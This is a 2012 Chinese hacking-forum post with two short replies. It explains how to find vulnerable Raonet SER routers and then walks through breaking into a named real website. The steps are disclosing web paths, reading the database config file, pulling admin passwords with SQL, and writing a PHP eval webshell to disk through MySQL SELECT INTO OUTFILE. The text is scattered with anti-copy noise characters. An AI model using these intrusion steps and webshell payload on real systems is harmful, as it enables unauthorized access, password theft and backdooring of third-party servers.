找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2654|回复: 2
打印 上一主题 下一主题

利用某路由器漏洞入侵国外站点

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-10 10:30:18 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
  寻找存在漏洞的路由器方法:+ @# d0 V2 u$ M9 M/ A

. J. l" v( S' j4 w1:google搜索'Raonet Subscriber Ethernet Router'
2 ^& w3 X8 X3 U' q8 W
3 M# R; R3 ~% o2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001$ |$ H" g- k0 X

% \9 i6 j( o6 r4 |8 d8 K3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
; [3 d7 ]- p4 f) Y. `" F! W3 \6 E5 T$ o/ e, n0 g, n
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
% U/ ?! Q7 @% J1 K% k% _) N' g6 j% c+ T
0 @7 b  }5 r4 ?$ l: k7 W5 ~* }4 r

3 b5 u! ~+ f/ ]: u; e  Q$ x入侵步骤:
2 y. m! V/ z( z2 j8 o# k4 ^3 E- J3 |" ]5 n6 O8 }5 M' O
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php
8 Q3 @' P/ |& F, H- p4 |" S" R( a; Q2 h7 u. w! d) p$ z5 q
2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc
; ]9 w7 W0 k  e3:得到密码后连接,查看GUI管理密码:
- ?8 {' J, u7 [, O) Z* t: buse ser_500, K& |6 X1 ?8 {, g6 \
select id,passwd from user;
( |# `: [4 _# q; Z4:通过数据库写入webshell,执行命令:9 l( ]+ U, L( K
use mysql;
5 V5 m1 C: y7 G3 pcreate table ok(cmd TEXT);
, [* ]. `9 ?/ E+ K, V# rinsert into ok values("<?php @eval($_POST[cmd])?>");' b: i& z* z' a3 A0 B7 O( c, x
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";0 c; K( E/ r' z& j7 I
drop table ok;
4 H4 A' [/ K* x9 z) s+ o! k$ D! `" W% u+ @
5:连接后门shell.php
1 K4 ?/ w; W. g2 Y9 Z- C3 [" b1 Y1 B1 {. u4 C3 Y9 X- b- x
6. 搞定!
8 w* O2 `5 [% `: [6 d# G  |1 `: i6 I& t
回复

使用道具 举报

板凳
发表于 2013-7-29 12:07:54 | 只看该作者
不错哦,黑服务器补洞。。
回复 支持 反对

使用道具 举报

沙发
发表于 2013-7-27 20:06:50 | 只看该作者
这个后果可以很严重的说
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表